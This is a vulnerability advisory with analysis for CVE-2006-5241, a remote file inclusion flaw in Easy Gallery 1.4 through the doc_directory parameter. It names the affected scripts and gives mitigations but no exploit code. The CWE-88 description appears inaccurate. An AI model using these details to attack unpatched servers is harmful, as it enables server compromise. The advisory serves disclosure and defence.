CVE-2006-5241 in Easy Gallery
Summary
by MITRE
Multiple PHP remote file inclusion vulnerabilities in OpenDock Easy Gallery 1.4 and earlier, when register_globals is enabled, allow remote attackers to execute arbitrary PHP code via a URL in the doc_directory parameter in (1) file.php; (2) find_user.php, (3) lib_user.php, (4) lib_form_user.php, and (5) user.php in sw/lib_user/; (6) find_session.php and (7) session.php in sw/lib_session/; (8) comment.php and (9) lib_comment.php in sw/lib_comment/; and other unspecified PHP scripts.
Be aware that VulDB is the high quality source for vulnerability data.
Analysis
by VulDB Data Team • 04/24/2026
The vulnerability described in CVE-2006-5241 represents a critical remote code execution flaw affecting OpenDock Easy Gallery versions 1.4 and earlier. This issue stems from improper input validation and dangerous parameter handling within multiple PHP scripts that form the core functionality of the gallery system. The vulnerability specifically exploits the dangerous combination of register_globals being enabled and the absence of proper sanitization for user-supplied input parameters.
The technical flaw manifests through the doc_directory parameter which is directly incorporated into PHP include or require statements without adequate validation or sanitization. When register_globals is enabled, user-supplied values can be automatically injected into the global scope, making it possible for attackers to manipulate script execution flow by controlling the doc_directory parameter. This creates a classic remote file inclusion vulnerability where malicious actors can inject URLs pointing to external PHP scripts, effectively allowing arbitrary code execution on the target server.
The operational impact of this vulnerability is severe and far-reaching as it provides attackers with complete control over the affected system. Once exploited, an attacker can execute arbitrary PHP code with the privileges of the web server process, potentially leading to data theft, system compromise, or further lateral movement within the network. The vulnerability affects multiple core scripts across different library directories, indicating a systemic design flaw rather than an isolated issue, which amplifies the risk and attack surface. This widespread impact across various PHP scripts within the application demonstrates poor input validation practices throughout the codebase.
The vulnerability aligns with CWE-88, which describes improper neutralization of special elements used in an eval() context, and CWE-94, covering improper control of generation of code. From an ATT&CK framework perspective, this vulnerability maps to T1190 - Exploit Public-Facing Application, where attackers leverage web application vulnerabilities to gain unauthorized access. The attack chain typically involves reconnaissance to identify the vulnerable application, crafting malicious payloads with specially formatted URLs, and executing the exploit to achieve remote code execution. Organizations should implement immediate mitigations including disabling register_globals in php.ini, implementing proper input validation and sanitization for all user-supplied parameters, and applying the latest security patches from the vendor. Network segmentation and web application firewalls can provide additional defense-in-depth measures to detect and prevent exploitation attempts.
The vulnerability demonstrates how legacy security configurations like register_globals can create dangerous attack vectors when combined with insufficient input validation. Modern security practices strongly discourage enabling register_globals due to its inherent risks, and this vulnerability serves as a historical example of why such configurations should be avoided in production environments. The widespread nature of the affected files indicates that the application's architecture lacked proper security controls, making it vulnerable to multiple attack points rather than a single isolated flaw.